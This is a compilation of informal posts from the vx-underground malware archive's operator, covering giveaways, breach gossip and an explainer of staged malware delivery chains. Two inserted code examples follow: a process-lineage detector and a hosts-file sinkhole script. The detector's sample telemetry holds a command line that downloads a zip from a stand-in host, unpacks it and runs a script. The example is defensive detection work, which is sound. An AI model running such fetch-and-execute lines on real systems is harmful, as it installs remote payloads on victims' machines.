The largest collection of malware source, samples, and papers on the internet. Password: infected https://vx-underground.org/
Dear Telegram nerds,
I've been AFK because it's been the holiday season. I've mostly been memeing to posts on Xitter. I'm not sure if any of you give a fuck, but tomorrow or Monday I'm doing a pseudo random giveaway thingie. I'm giving away $119,000 of cybersecurity courses. I'm gifting 400 people Cyber Warfare Live Infinity lab things.
https://x.com/vxunderground/status/1994830660704358684
Correction: 250,000+ upvotes.
If Xitter was a real place Tim Sweeney would be in serious trouble. After seeing this insane RATIO he probably wiped tears from his eyes with $100 bills while resting in his 5th Lamborghini
https://x.com/Bricker_Man/status/1994041026575798322
I was sitting here and I was like, "I wonder if any vendors have released any malware research papers? It's a major holiday in the United States, surely it's slowed down"
I check my MISP thingie and 27 papers released in the past 2 days
WHO ARE YOU PEOPLE
Big news for stinky nerds.
I've got a massive fuckin' giveaway. I've got a voucher for either a CompTIA Security+ or an ISC2 Systems Security Certified Practitioner (SSCP).
Both of these are great for your career.
But, I'm not going to give this shit away to some random fucking nerd in a comment section. This is the type of gift that could accelerate someone's career and change someone's life.
Some giveaways people burn, watch YouTube shorts, and shoot the shit with their friends on Discord calls like a bunch of bums. This is going to be vetted. When I gift this to someone I expect them to follow through with it.
If you're gifted a career changing gift and you squander it I WILL lose my mind.
More information coming soon.
Some silly stuff happening this Thanksgiving.
Mixpanel, a company that lets your company perform analytics on your ChatGPT slop, has been compromised. However, because Mixpanel requires you to have an OpenAI account, and does analysis on your ChatGPT slop, some media outlets are mischaracterizing it as an OpenAI compromise.
Mixpanel has stated several times this is NOT an OpenAI breach presumably because they don't want Sam Altman and his group of bazillbobillionaires to physically beat Mixpanel executives to death with a shovel
I haven't returned to the idea in so long I didn't realize these nerds kind of did it. It's not a full POC, but it's close to what I've been toying with for a while.
https://www.praetorian.com/blog/leveraging-microsoft-text-services-framework-tsf-for-red-team-operations/
In like, 2020 I read this paper from 2006 about a malware keylogging idea. It was briefly discussed on forums and some cybersecurity conventions.
No one ever produced code for the idea.
Every few months I return back to the idea and poke around for a bit.
I have no idea why I've been obsessed with this idea for FIVE FUCKING YEARS. Regardless, today after poking around some more I think I finally figured it out.
Hi,
I will begin doing giveaways soon for the holiday season. This will be our third year doing giveaways.
This year I'll be giving away significantly less stuff because I have a baby and he doesn't respect anything except milk, food, pooping, and sleep.
Regardless, I still have lots of cool stuff to giveaway.
I'll be doing giveaways from cyberwarfarelab, CCGCyberWorld, HCAdamSec, ddd1ms, and some stuff from myself personally out-of-pocket. I forgot to harass more people for free stuff. I'm sure someone will come around.
For those new: each holiday season I give away a bunch of educational cybersecurity and/or information technology stuff. It's for anyone.
tl;dr cats r cool
Sometimes I still think about how zhangsansec hacked our website.
He found the silliest bug.
The bug allowed him to arbitrarily upload, download, edit, and delete files. He couldn't modify any website code, but he had the ability for a brief moment in time to destroy our entire archive.
When he discovered the exploit he notified us via DM. He didn't ask for anything in return. He didn't want a bug bounty. He shared his thoughts on where he believed the bug was on our side.
After he reported the vulnerability and confirmed we fixed it, ... he disappeared.
This guy is a fucking badass. Who the fuck was that absolute chad? Bro hacked our shit for the love of the game and as a meme ... then just left???
Might not work this week. In the United States it is a holiday called "Thanksgiving".
According to our educational institutions when we were like, 6 years old, Thanksgiving is the day on which we celebrate English settlers and the indigenous Native Americans sitting down and eating a lovely meal.
It is symbolic of the unity of English settlers who escaped tyranny, or something, and then befriended the indigenous people of the Americas. It is a day we share thanks and give, or whatever.
We later learn this is romanticized and partially incorrect. We also later learn in our educational institutions what followed this lovely meal was famine, war, disease, and anything else horrible you can fathom.
Despite virtually every single person in the United States acknowledging this is a romanticized myth, we still celebrate it because it's another reason to burn money and drive ourselves deeper into debt.
Following this, people do "Black Friday". Black Friday is a day where we worship our billionaire oligarchs and beg them for discounts and scraps of goods they no longer intend to sell at regular retail value.
Our billionaire overlords have been so pleased with this that the "Black Friday" event has now been extended for several days, as long as a week by some retailers, to ensure maximum exploitation of not only consumers but seasonal employees.
My least favorite thing about doing malware stuff is the absolutely deranged malware conspiracy theories.
I can't tell if it's mental illness, or the result of being terminally online, or ignorance, or all of the above.
I get messages from people writing about cross-platform metamorphic multi-staged information stealers abusing 0day exploits in image compression software which is delivered from Bruce Springsteen eBay listings.
You need to get off the computer, dawg
Today an old acquaintance of mine died. He and I were not close by any means. He was a family member of a friend.
The older I get, the more dead people I know.
I've lost a lot of friends, family, and acquaintances over the past 3 decades.
A majority of the deaths have been due to the influence of drugs or alcohol.
I know many of you younger people think (whether you acknowledge it or not) that you're invincible or "it wouldn't happen to me", but I cannot stress this enough: don't fuck around with drugs or alcohol.
"So when the devil wants to dance with you, you better say never, because a dance with the devil might just last you forever"
Absolute bloodbath on Xitter right now.
New changes have been pushed where you can now see the origin of someone's account. Additionally, it flags if they suspect the person is using a VPN.
Surprise Pikachu face, lots of people from India, Pakistan, and Indonesia impersonating Americans, Israelis, or Europeans to engagement bait for money.
Also, a surprisingly high number of people who are heavily involved in (commenting on) United States politics reside outside of the United States.
Funny stuff. Very silly.
tl;dr to kill Copilot forever just block copilot[.]microsoft[.]com
Thank you, young art student person place or thing.
It is very nice.
I didn't see the face behind everything originally because I don't have my glasses on (I'm old and stinky).
vx-underground (@vxunderground):
Big drama on the internet today (a very real and serious place)
On Steam, video games that have used AI to assist in making the game are given a "made with AI" tag.
Tim Sweeney, CEO of Epic Games, thinks this is a poor decision and says they will not be doing this on their platform
As you could probably imagine, this has made gamers go fuckin spazzo on Epic Games. Gamers have concluded Steam has (once again) won the "battle" by doing nothing.
Mr. Sweeney was ruthlessly flamed on social media for it. Some reposts got as many as 150,000 upvotes.
Will this make Epic Games change their mind? Probably not, no
Is it fun to throw tomatoes at wealthy people, politicians, and large businesses? Yes
To the person who keeps sending me e-mails from the alleged compromised Papa Johns email,
I can't tell if you're memeing or not. You keep e-mailing journalists and stuff but the e-mail is flagged as failing domain authentication. I don't know what you're doing.
"SAM, I SWEAR I DIDNT SAY U WERE COMPROMISED. IM SORRY SAM, PLEASE DONT BREAK MY LEGS"
Letting bro hide until the coast is clear. Fuck the police
It's not even like, super cool or 1337. It's just something that's been bugging me for years. I was annoyed that no one produced code for it and I didn't get it working. It was like an itch I couldn't get to go away.
If you had to choose between never seeing your family ever again or never being able to get on the internet ever again
Which website would you visit once your family is gone forever
If you want to learn more about malware the easiest method is learning malware TTPs (Tactics Techniques and Procedures). Basically, understand some of the techniques employed by malware authors to do stuff
Some malware techniques are simple and old
Some malware techniques are incredibly sophisticated
What you'll notice though with malware TTPs is each TTP is a "stepping stone". For example, the most advanced evasion techniques often stem from the most basic of evasion techniques.
Research and improvements on malware don't come from nowhere. Each technique comes from standing (metaphorically) on the work of others.
Malware TTPs are broken down kind of subjectively. They're hard to categorize. MITRE is the industry standard for malware TTPs, but even then there is some debate on the effectiveness of it.
By effectiveness I mean, if you have a simple malware technique that is slightly modified, is it the same malware technique? Is it a whole new category? How many "modifications" until it has its own entry? It's just debating classification.
For Windows malware, however, malware is defined as something along the lines of:
1. How was it delivered to the machine?
2. How many "chains" or "stages" or "redirects" were performed until the payload was detonated?
3. How was the payload detonated?
4. Is the payload persistent?
5. What was the objective of the malware?
On missiles and stuff, the part that explodes is the payload. It is the same concept with malware. The actual malicious code that does the malicious stuff is the payload.
With chains, or redirects, or stages, ... modern malware is often not as simple as someone double-clicking a .exe and the payload detonating. While this is true for common malware, more sophisticated malware will often jump through a series of hoops until the actual payload is detonated.
For example, more sophisticated malware may send a malicious email attachment that is a .Lnk file (shortcut file). When the user double-clicks the .Lnk file, the .Lnk file may download a .zip file. The .Lnk file will extract the .zip, which will contain a malicious .JS file. The .Lnk file will execute the .JS file.
The .JS file will delete the .Lnk and .zip. The .JS file will then generate a .PS1 script and execute it. The .PS1 file will delete the .JS file and download a .exe file. The .exe file will then download a .dll file. The .DLL is the payload.
1. Lnk downloads .zip
2. Lnk extracts zip
3. Lnk runs .JS
4. JS deletes .Lnk
5. JS deletes .zip
6. JS makes .ps1
7. ps1 downloads .exe
8. ps1 deletes .JS
9. .exe downloads .DLL
10. .exe runs .DLL payload
The reason malware does this is because it makes it difficult for antivirus software to identify the final payload. Researchers will need to reconstruct the series of events which lead to the payload delivery. Additionally, malware authors may modify the chaining at any given moment to make detection much more difficult.
Okay, that's enough schizo ranting for now.
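The chain in the post, seen from the defender's side, as an added example (this is not code from the post, and the events, user name, file names and host name are constructed, hypothetical samples): given process-creation telemetry with parent PID, image and command line, walk the parent links back from the final stage and list the staged files the command lines named. The point the post makes is that the final .dll on its own tells you little; the lineage is the detection, and files the chain deleted still appear on the command lines that referenced them.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation event: the fields Sysmon event 1 or EDR telemetry gives you."""
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed sample telemetry (hypothetical user, paths and host name) for the
# chain in the post: .lnk -> .zip -> .js -> .ps1 -> .exe -> .dll.
SAMPLE_EVENTS = [
    ProcEvent(1000, 4, r"C:\Windows\explorer.exe", "explorer.exe"),
    # user double-clicks the .lnk; its target is cmd.exe, which fetches and
    # unpacks the zip and hands off to the .js
    ProcEvent(1100, 1000, r"C:\Windows\System32\cmd.exe",
              r"cmd.exe /c curl -s http://example.invalid/a.zip -o %TEMP%\a.zip "
              r"&& tar -xf %TEMP%\a.zip -C %TEMP% && wscript %TEMP%\a.js"),
    ProcEvent(1200, 1100, r"C:\Windows\System32\wscript.exe",
              r"wscript C:\Users\bob\AppData\Local\Temp\a.js"),
    ProcEvent(1300, 1200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell -ep bypass -w hidden -f C:\Users\bob\AppData\Local\Temp\b.ps1"),
    ProcEvent(1400, 1300, r"C:\Users\bob\AppData\Local\Temp\c.exe",
              r"C:\Users\bob\AppData\Local\Temp\c.exe"),
    ProcEvent(1500, 1400, r"C:\Windows\System32\rundll32.exe",
              r"rundll32 C:\Users\bob\AppData\Local\Temp\d.dll,Start"),
    # unrelated benign activity under the same explorer.exe
    ProcEvent(2000, 1000, r"C:\Program Files\Notepad\notepad.exe", "notepad.exe"),
]

# Interpreters / loaders that make up the intermediate stages, keyed by image basename.
STAGE_BY_IMAGE = {
    "cmd.exe": "cmd", "wscript.exe": "wsh", "cscript.exe": "wsh",
    "powershell.exe": "powershell", "pwsh.exe": "powershell", "rundll32.exe": "rundll32",
}
SYSTEM_BINARIES = set(STAGE_BY_IMAGE) | {"explorer.exe"}
ARTIFACT_RE = re.compile(r"[\w%:\\.\-]+\.(?:lnk|zip|js|ps1|exe|dll)\b", re.IGNORECASE)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def stage_of(ev):
    """Label an event by the stage it represents, or None for ordinary processes."""
    label = STAGE_BY_IMAGE.get(basename(ev.image))
    if label is None and "\\appdata\\local\\temp\\" in ev.image.lower():
        label = "dropped-exe"  # a binary executing out of a user-writable temp dir
    return label


def lineage(events, leaf_pid):
    """Follow ppid links from the leaf to the root; returns the chain root-first."""
    by_pid = {e.pid: e for e in events}
    chain, pid, seen = [], leaf_pid, set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid].ppid
    return chain[::-1]


def stages(chain):
    return [s for s in map(stage_of, chain) if s]


def artifacts(chain):
    """Staged files named on the command lines (basenames, first-seen order),
    excluding the system interpreters themselves. Files the chain later deleted
    still show up, because the command lines that referenced them survive."""
    found = []
    for ev in chain:
        for m in ARTIFACT_RE.findall(ev.cmdline):
            name = basename(m)
            if name not in SYSTEM_BINARIES and name not in found:
                found.append(name)
    return found


def is_staged_delivery(chain, min_stages=3):
    """Heuristic: three or more distinct interpreter/loader hops is a staged chain."""
    return len(set(stages(chain))) >= min_stages


if __name__ == "__main__":
    chain = lineage(SAMPLE_EVENTS, 1500)
    print(" -> ".join(stages(chain)))   # cmd -> wsh -> powershell -> dropped-exe -> rundll32
    print(artifacts(chain))             # ['a.zip', 'a.js', 'b.ps1', 'c.exe', 'd.dll']
    print(is_staged_delivery(chain), is_staged_delivery(lineage(SAMPLE_EVENTS, 2000)))
```

Run it against the constructed events and the rundll32 stage resolves to a five-hop chain rooted at explorer.exe, while the notepad.exe sibling under the same parent is not flagged. Swap in real Sysmon or EDR rows and the same walk reconstructs the series of events the post says researchers have to rebuild; the stage list is where a detection rule would key, since the author can swap file names and extensions far more cheaply than the shape of the chain.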
SCHMEELLY I THINK THE GOVERNMENT PUT A RAT IN MY PHONE
Dawg, you play Diablo and piss in empty soda cans. The government does NOT give a fuck about you.
I cannot keep track of the number of deceased I know. It's pretty high and it grows each year.
Off the top of my head:
- 4 Dead from drunk driving
- 1 Overdose
- 3 Suicides (addicted to drugs)
- 2 Dead from medical complications from alcohol
Hello,
Soon I will be off-loading our vx-underground merch stuff to 1336_0ff_by_0ne.
1. Bradley primarily handled merchandise stuff. Unfortunately, Bradley isn't really around anymore due to sickness in his family. His father is terminally ill (sort of, long story), and Bradley is working a full-time job while also simultaneously taking care of his father. Bradley is a real muthafuckin G, works his fuckin' ass off, and takes care of his family. I love him.
2. I do malware paper collections, malware sample collections, social media posts, ... pretty much everything related to vx-underground. I also do weird dumb goofy shit like spend 16 hours poking Microsoft Copilot with a stick. I also (also) do this while working full-time and having a family. I do not possess the energy to deal with merchandise stuff.
3. 1336 0ff by 0ne is amazing. He does everything by hand (making the merchandise) and he also does the artwork by himself. He's a fucking genius and I love his work.
My plan is to basically offload all vx-underground merchandise to him, with him keeping a majority of the profit and myself only getting some pennies, or something. Our current deal with Shopify doesn't give us shit anyway. We make like, $1 off a shirt. If we use 1336 0ff by 0ne then at least someone cool is making money and not some slimy fuck in a suit.
Ideally, if I offload this merchandise stuff to 1336 0ff by 0ne we can have cool stuff happen such as:
1. I no longer have to deal with merchandise stuff, I'm busy
2. 1336 0ff by 0ne gets more business. We get some merchandise sales so hopefully people will think his merchandise is cool and badass and he makes some money too.
Look at his Emotet and Lockbit malwear* merchandise. It's cool and badass
yOurE nOt a ReAl pRoGraMmeR uNlEsS yOu knOw ASSemBly
1. It's an instruction set
2. It's illegal
3. It's for nerds
[continued]
I quickly realized though that if you go to
C:\Windows\System32\drivers\etc\hosts
... and make an entry that makes the Microsoft Copilot AI domain resolve to localhost, Copilot implodes and drops dead. It can no longer access any API endpoints hence it cannot exist.
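The hosts-file trick from the tl;dr above and this post, as an added example (not code from the post): a small parser for the hosts file format that checks what a name currently resolves to, and an idempotent function that appends a localhost entry only for names not already mapped. The sample hosts content is constructed, the path is the one the post gives, and the domain is the one the post names.

```python
"""Sinkhole hostnames via the hosts file, idempotently, and verify the mapping."""

HOSTS_PATH = r"C:\Windows\System32\drivers\etc\hosts"  # path from the post

# Constructed sample hosts file (not copied from any real system).
SAMPLE_HOSTS = (
    "# Copyright (c) 1993-2009 Microsoft Corp.\n"
    "# localhost name resolution is handled within DNS itself.\n"
    "#\t127.0.0.1       localhost\n"
    "192.168.1.10   fileserver fileserver.corp.example   # trailing comment\n"
)


def parse_hosts(text):
    """Return [(ip, [names])] for every effective line; blank lines and comments are dropped."""
    entries = []
    for line in text.splitlines():
        body = line.split("#", 1)[0].strip()
        if not body:
            continue
        ip, *names = body.split()
        entries.append((ip, [n.lower() for n in names]))
    return entries


def hosts_lookup(text, name):
    """Address the hosts file gives for name (case-insensitive, first match wins) or None."""
    name = name.lower()
    for ip, names in parse_hosts(text):
        if name in names:
            return ip
    return None


def sink_hosts(text, names, target="127.0.0.1", tag="sinkholed"):
    """Append 'target name' for each name not already mapped. Returns (new_text, added)."""
    out = text if not text or text.endswith("\n") else text + "\n"
    added = []
    for name in names:
        if hosts_lookup(out, name) is None:
            out += f"{target} {name.lower()}  # {tag}\n"
            added.append(name.lower())
    return out, added


def apply_to_file(path, names, target="127.0.0.1"):
    """Rewrite the real hosts file; on Windows this needs an elevated shell."""
    with open(path, encoding="utf-8") as f:
        text = f.read()
    new_text, added = sink_hosts(text, names, target)
    if added:
        with open(path, "w", encoding="utf-8") as f:
            f.write(new_text)
    return added


if __name__ == "__main__":
    new_text, added = sink_hosts(SAMPLE_HOSTS, ["copilot.microsoft.com"])
    print(added, hosts_lookup(new_text, "Copilot.Microsoft.com"))  # ['copilot.microsoft.com'] 127.0.0.1
```

Calling `apply_to_file(HOSTS_PATH, ["copilot.microsoft.com"])` twice adds the line once. After editing the real file, run `ipconfig /flushdns` so a cached answer does not outlive the change. Some people sink to `0.0.0.0` instead of `127.0.0.1` so the traffic never reaches anything listening locally. The post names a single domain; whether Copilot reaches other endpoints is something to confirm from your own DNS logs rather than assume.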